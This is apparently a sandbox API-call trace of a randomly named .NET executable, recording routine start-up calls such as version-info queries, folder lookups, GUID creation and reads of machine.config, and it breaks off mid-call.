# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 12.10.2020 12:22:16.633 Process: id = "1" image_name = "v5vybig3hwd7d5jw.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v5vybig3hwd7d5jw.exe" page_root = "0x4be7e000" os_pid = "0xad0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xac4 [0038.883] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0040.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x24ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0040.968] IsAppThemed () returned 0x1 [0040.971] CoTaskMemAlloc (cb=0xf0) returned 0x485c68 [0040.972] CreateActCtxA (pActCtx=0x24f178) returned 0x485e5c [0041.048] CoTaskMemFree (pv=0x485c68) [0041.060] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc16c [0041.060] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc16a [0041.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", nBufferLength=0x105, lpBuffer=0x24eb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", lpFilePart=0x0) returned 0x41 [0041.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", nBufferLength=0x105, lpBuffer=0x24eac8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", lpFilePart=0x0) returned 0x41 [0041.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", nBufferLength=0x105, lpBuffer=0x24eb24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", lpFilePart=0x0) returned 0x3a [0041.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", nBufferLength=0x105, lpBuffer=0x24ea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", lpFilePart=0x0) returned 0x3a [0041.712] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", nBufferLength=0x105, lpBuffer=0x24eaf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", lpFilePart=0x0) returned 0x3a [0041.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x24ef54) returned 1 [0041.714] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v5vybig3hwd7d5jw.exe"), fInfoLevelId=0x0, lpFileInformation=0x24efd0 | out: lpFileInformation=0x24efd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x507c4880, ftCreationTime.dwHighDateTime=0x1d6a092, ftLastAccessTime.dwLowDateTime=0x507c4880, ftLastAccessTime.dwHighDateTime=0x1d6a092, ftLastWriteTime.dwLowDateTime=0x127e2500, ftLastWriteTime.dwHighDateTime=0x1d6a090, nFileSizeHigh=0x0, nFileSizeLow=0xb7400)) returned 1 [0041.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x24ef50) returned 1 [0041.718] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", lpdwHandle=0x24f044 | out: lpdwHandle=0x24f044) returned 0x6ac [0041.719] GetFileVersionInfoW (in: lptstrFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe", dwHandle=0x0, dwLen=0x6ac, lpData=0x28a8f70 | out: lpData=0x28a8f70) returned 1 [0041.720] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24f018, puLen=0x24f014 | out: lplpBuffer=0x24f018*=0x28a900c, puLen=0x24f014) returned 1 [0041.724] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24ef98, puLen=0x24ef94 | out: lplpBuffer=0x24ef98*=0x28a90ac, puLen=0x24ef94) returned 1 [0041.724] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24ef98, puLen=0x24ef94 | out: lplpBuffer=0x24ef98*=0x28a90dc, puLen=0x24ef94) returned 1 [0041.724] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24ef98, puLen=0x24ef94 | out: lplpBuffer=0x24ef98*=0x28a9110, puLen=0x24ef94) returned 1 [0041.724] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24ef98, puLen=0x24ef94 | out: lplpBuffer=0x24ef98*=0x28a9144, puLen=0x24ef94) returned 1 [0041.724] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24ef98, puLen=0x24ef94 | out: lplpBuffer=0x24ef98*=0x28a9178, puLen=0x24ef94) returned 1 [0041.724] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24ef98, puLen=0x24ef94 | out: lplpBuffer=0x24ef98*=0x28a920c, puLen=0x24ef94) returned 1 [0041.724] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24ef98, puLen=0x24ef94 | out: lplpBuffer=0x24ef98*=0x28a923c, puLen=0x24ef94) returned 1 [0041.725] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24ef98, puLen=0x24ef94 | out: lplpBuffer=0x24ef98*=0x28a9274, puLen=0x24ef94) returned 1 [0041.725] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24ef98, puLen=0x24ef94 | out: lplpBuffer=0x24ef98*=0x28a9064, puLen=0x24ef94) returned 1 [0041.725] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24ef98, puLen=0x24ef94 | out: lplpBuffer=0x24ef98*=0x28a91d4, puLen=0x24ef94) returned 1 [0041.725] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24ef98, puLen=0x24ef94 | out: lplpBuffer=0x24ef98*=0x0, puLen=0x24ef94) returned 0 [0041.725] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24ef98, puLen=0x24ef94 | out: lplpBuffer=0x24ef98*=0x0, puLen=0x24ef94) returned 0 [0041.725] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24ef8c, puLen=0x24ef88 | out: lplpBuffer=0x24ef8c*=0x28a900c, puLen=0x24ef88) returned 1 [0041.725] VerLanguageNameW (in: wLang=0x0, szLang=0x24ed1c, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0041.730] VerQueryValueW (in: pBlock=0x28a8f70, lpSubBlock="\\", lplpBuffer=0x24ef9c, puLen=0x24ef98 | out: lplpBuffer=0x24ef9c*=0x28a8f98, puLen=0x24ef98) returned 1 [0043.203] CoTaskMemAlloc (cb=0x20c) returned 0x498cf0 [0043.203] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x498cf0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0043.205] CoTaskMemFree (pv=0x498cf0) [0043.205] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x24eabc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0043.205] CoTaskMemAlloc (cb=0x20c) returned 0x498cf0 [0043.205] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x498cf0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0043.207] CoTaskMemFree (pv=0x498cf0) [0043.207] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x24eabc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0043.212] CoCreateGuid (in: pguid=0x24e874 | out: pguid=0x24e874*(Data1=0xc6b4af5, Data2=0xa2ba, Data3=0x443d, Data4=([0]=0x80, [1]=0xec, [2]=0xaf, [3]=0xdf, [4]=0x8b, [5]=0x4, [6]=0x53, [7]=0xde))) returned 0x0 [0043.212] CoCreateGuid (in: pguid=0x24e874 | out: pguid=0x24e874*(Data1=0x2e4399f0, Data2=0x4972, Data3=0x43f5, Data4=([0]=0xb7, [1]=0x68, [2]=0x60, [3]=0x1e, [4]=0x2c, [5]=0x0, [6]=0x9d, [7]=0xa6))) returned 0x0 [0043.212] CoCreateGuid (in: pguid=0x24e874 | out: pguid=0x24e874*(Data1=0x62772295, Data2=0x3f63, Data3=0x4d4b, Data4=([0]=0xb1, [1]=0x40, [2]=0xf5, [3]=0x6e, [4]=0x1, [5]=0x21, [6]=0xe6, [7]=0xb))) returned 0x0 [0043.212] CoCreateGuid (in: pguid=0x24e874 | out: pguid=0x24e874*(Data1=0x35a11cf6, Data2=0xcadd, Data3=0x431b, Data4=([0]=0x94, [1]=0x85, [2]=0x93, [3]=0x44, [4]=0x4d, [5]=0xc3, [6]=0xc1, [7]=0xbf))) returned 0x0 [0043.213] CoCreateGuid (in: pguid=0x24e874 | out: pguid=0x24e874*(Data1=0xe0c7e1b5, Data2=0x9441, Data3=0x4d1b, Data4=([0]=0xab, [1]=0xb2, [2]=0x6f, [3]=0x10, [4]=0x7f, [5]=0x1a, [6]=0x69, [7]=0xf7))) returned 0x0 [0043.213] CoCreateGuid (in: pguid=0x24e874 | out: pguid=0x24e874*(Data1=0xaec4e0db, Data2=0xad87, Data3=0x43ba, Data4=([0]=0xb9, [1]=0x41, [2]=0x3e, [3]=0xa7, [4]=0x40, [5]=0xbf, [6]=0x6c, [7]=0x3d))) returned 0x0 [0043.213] CoCreateGuid (in: pguid=0x24e874 | out: pguid=0x24e874*(Data1=0x63847177, Data2=0x4605, Data3=0x486e, Data4=([0]=0x90, [1]=0x10, [2]=0x8a, [3]=0x61, [4]=0xb1, [5]=0x36, [6]=0xc0, [7]=0xa4))) returned 0x0 [0043.213] CoCreateGuid (in: pguid=0x24e874 | out: pguid=0x24e874*(Data1=0x172611ad, Data2=0x1f9e, Data3=0x4450, Data4=([0]=0x84, [1]=0x13, [2]=0x1e, [3]=0x3f, [4]=0xe3, [5]=0xd9, [6]=0xcc, [7]=0xaa))) returned 0x0 [0043.213] CoCreateGuid (in: pguid=0x24e874 | out: pguid=0x24e874*(Data1=0xfdb313d5, Data2=0x3850, Data3=0x449e, Data4=([0]=0x8f, [1]=0x21, [2]=0x77, [3]=0x62, [4]=0xdb, [5]=0x7d, [6]=0x32, [7]=0xba))) returned 0x0 [0043.213] CoCreateGuid (in: pguid=0x24e874 | out: pguid=0x24e874*(Data1=0x6be520d7, Data2=0x7a53, Data3=0x4349, Data4=([0]=0x88, [1]=0x42, [2]=0xa8, [3]=0x1, [4]=0xd3, [5]=0x4, [6]=0x54, [7]=0x72))) returned 0x0 [0043.213] CoCreateGuid (in: pguid=0x24e874 | out: pguid=0x24e874*(Data1=0xfd836ef1, Data2=0x7cde, Data3=0x4c1c, Data4=([0]=0x90, [1]=0x7d, [2]=0x72, [3]=0x9e, [4]=0x9f, [5]=0x97, [6]=0x9d, [7]=0x57))) returned 0x0 [0043.213] CoCreateGuid (in: pguid=0x24e874 | out: pguid=0x24e874*(Data1=0x991dccc5, Data2=0xa0a3, Data3=0x4646, Data4=([0]=0x81, [1]=0x2b, [2]=0xb, [3]=0x6d, [4]=0x57, [5]=0xfa, [6]=0xbe, [7]=0xf4))) returned 0x0 [0043.222] CoCreateGuid (in: pguid=0x24e998 | out: pguid=0x24e998*(Data1=0xd64c6755, Data2=0x99db, Data3=0x4afe, Data4=([0]=0xa1, [1]=0x4f, [2]=0xd0, [3]=0xbd, [4]=0x2e, [5]=0xbf, [6]=0xcf, [7]=0x21))) returned 0x0 [0043.222] CoCreateGuid (in: pguid=0x24e998 | out: pguid=0x24e998*(Data1=0x71f5d4b, Data2=0x24da, Data3=0x4f82, Data4=([0]=0x81, [1]=0xfa, [2]=0xb6, [3]=0x81, [4]=0xfb, [5]=0xea, [6]=0xe1, [7]=0x5f))) returned 0x0 [0043.222] CoCreateGuid (in: pguid=0x24e998 | out: pguid=0x24e998*(Data1=0xc136b269, Data2=0xfb92, Data3=0x4381, Data4=([0]=0x94, [1]=0x9e, [2]=0x69, [3]=0xef, [4]=0x56, [5]=0x53, [6]=0xa1, [7]=0xbb))) returned 0x0 [0043.439] GetCurrentProcess () returned 0xffffffff [0043.440] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24edec | out: TokenHandle=0x24edec*=0x270) returned 1 [0043.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x24e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0043.446] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x24edec | out: lpFileInformation=0x24edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0043.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x24e898, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0043.447] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x24edec | out: lpFileInformation=0x24edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0043.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x24e824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0043.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x24ed18) returned 1 [0043.449] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x274 [0043.449] GetFileType (hFile=0x274) returned 0x1 [0043.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x24ed14) returned 1 [0043.449] GetFileType (hFile=0x274) returned 0x1 [0043.457] GetFileSize (in: hFile=0x274, lpFileSizeHigh=0x24ede0 | out: lpFileSizeHigh=0x24ede0*=0x0) returned 0x8c8f [0043.457] ReadFile (in: hFile=0x274, lpBuffer=0x28be7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ed9c, lpOverlapped=0x0 | out: lpBuffer=0x28be7a0*, lpNumberOfBytesRead=0x24ed9c*=0x1000, lpOverlapped=0x0) returned 1 [0043.476] ReadFile (in: hFile=0x274, lpBuffer=0x28be7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ec38, lpOverlapped=0x0 | out: lpBuffer=0x28be7a0*, lpNumberOfBytesRead=0x24ec38*=0x1000, lpOverlapped=0x0) returned 1 [0043.481] ReadFile (in: hFile=0x274, lpBuffer=0x28be7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24eaec, lpOverlapped=0x0 | out: lpBuffer=0x28be7a0*, lpNumberOfBytesRead=0x24eaec*=0x1000, lpOverlapped=0x0) returned 1 [0043.482] ReadFile (in: hFile=0x274, lpBuffer=0x28be7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24eaec, lpOverlapped=0x0 | out: lpBuffer=0x28be7a0*, lpNumberOfBytesRead=0x24eaec*=0x1000, lpOverlapped=0x0) returned 1 [0043.482] ReadFile (in: hFile=0x274, lpBuffer=0x28be7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24eaec, lpOverlapped=0x0 | out: lpBuffer=0x28be7a0*, lpNumberOfBytesRead=0x24eaec*=0x1000, lpOverlapped=0x0) returned 1 [0043.482] ReadFile (in: hFile=0x274, lpBuffer=0x28be7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ea24, lpOverlapped=0x0 | out: lpBuffer=0x28be7a0*, lpNumberOfBytesRead=0x24ea24*=0x1000, lpOverlapped=0x0) returned 1 [0043.487] ReadFile (in: hFile=0x274, lpBuffer=0x28be7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24eba0, lpOverlapped=0x0 | out: lpBuffer=0x28be7a0*, lpNumberOfBytesRead=0x24eba0*=0x1000, lpOverlapped=0x0) returned 1 [0043.489] ReadFile (in: hFile=0x274, lpBuffer=0x28be7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24eab4, lpOverlapped=0x0 | out: lpBuffer=0x28be7a0*, lpNumberOfBytesRead=0x24eab4*=0x1000, lpOverlapped=0x0) returned 1 [0043.489] ReadFile (in: hFile=0x274, lpBuffer=0x28be7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24eab4, lpOverlapped=0x0 | out: lpBuffer=0x28be7a0*, lpNumberOfBytesRead=0x24eab4*=0xc8f, lpOverlapped=0x0) returned 1 [0043.489] ReadFile (in: hFile=0x274, lpBuffer=0x28be7a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24eb74, lpOverlapped=0x0 | out: lpBuffer=0x28be7a0*, lpNumberOfBytesRead=0x24eb74*=0x0, lpOverlapped=0x0) returned 1 [0043.489] CloseHandle (hObject=0x274) returned 1 [0043.506] GetCurrentProcess () returned 0xffffffff [0043.507] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ef20 | out: TokenHandle=0x24ef20*=0x274) returned 1 [0043.507] GetCurrentProcess () returned 0xffffffff [0043.507] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ef20 | out: TokenHandle=0x24ef20*=0x268) returned 1 [0043.508] GetCurrentProcess () returned 0xffffffff [0043.508] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24edec | out: TokenHandle=0x24edec*=0x278) returned 1 [0043.508] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v5vybig3hwd7d5jw.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x24edec | out: lpFileInformation=0x24edec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.508] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", nBufferLength=0x105, lpBuffer=0x24e898, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config", lpFilePart=0x0) returned 0x41 [0043.508] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v5vYBIG3hWD7d5JW.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v5vybig3hwd7d5jw.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x24edec | out: lpFileInformation=0x24edec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.509] GetCurrentProcess () returned 0xffffffff [0043.509] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ef20 | out: TokenHandle=0x24ef20*=0x27c) returned 1 [0043.509] GetCurrentProcess () returned 0xffffffff [0043.509] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ef20 | out: TokenHandle=0x24ef20*=0x280) returned 1 [0043.512] GetCurrentProcess () returned 0xffffffff [0043.512] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ef24 | out: TokenHandle=0x24ef24*=0x284) returned 1 [0043.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x24e9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0043.512] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x24ef24 | out: lpFileInformation=0x24ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0043.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x24e95c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0043.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x24ee50) returned 1 [0043.512] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0043.513] GetFileType (hFile=0x288) returned 0x1 [0043.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x24ee4c) returned 1 [0043.513] GetFileType (hFile=0x288) returned 0x1 [0043.513] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x24ef18 | out: lpFileSizeHigh=0x24ef18*=0x0) returned 0x8c8f [0043.513] ReadFile (in: hFile=0x288, lpBuffer=0x28d71c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24eed4, lpOverlapped=0x0 | out: lpBuffer=0x28d71c8*, lpNumberOfBytesRead=0x24eed4*=0x1000, lpOverlapped=0x0) returned 1 [0043.513] ReadFile (in: hFile=0x288, lpBuffer=0x28d71c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ed70, lpOverlapped=0x0 | out: lpBuffer=0x28d71c8*, lpNumberOfBytesRead=0x24ed70*=0x1000, lpOverlapped=0x0) returned 1 [0043.513] ReadFile (in: hFile=0x288, lpBuffer=0x28d71c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ec24, lpOverlapped=0x0 | out: lpBuffer=0x28d71c8*, lpNumberOfBytesRead=0x24ec24*=0x1000, lpOverlapped=0x0) returned 1 [0043.514] ReadFile (in: hFile=0x288, lpBuffer=0x28d71c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ec24, lpOverlapped=0x0 | out: lpBuffer=0x28d71c8*, lpNumberOfBytesRead=0x24ec24*=0x1000, lpOverlapped=0x0) returned 1 [0043.514] ReadFile (in: hFile=0x288, lpBuffer=0x28d71c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ec24, lpOverlapped=0x0 | out: lpBuffer=0x28d71c8*, lpNumberOfBytesRead=0x24ec24*=0x1000, lpOverlapped=0x0) returned 1 [0043.514] ReadFile (in: hFile=0x288, lpBuffer=0x28d71c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24eb5c, lpOverlapped=0x0 | out: lpBuffer=0x28d71c8*, lpNumberOfBytesRead=0x24eb5c*=0x1000, lpOverlapped=0x0) returned 1 [0043.515] CloseHandle (hObject=0x288) returned 1 [0043.515] GetCurrentProcess () returned 0xffffffff [0043.515] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24eee0 | out: TokenHandle=0x24eee0*=0x288) returned 1 [0043.515] GetFullPathNameW (in: 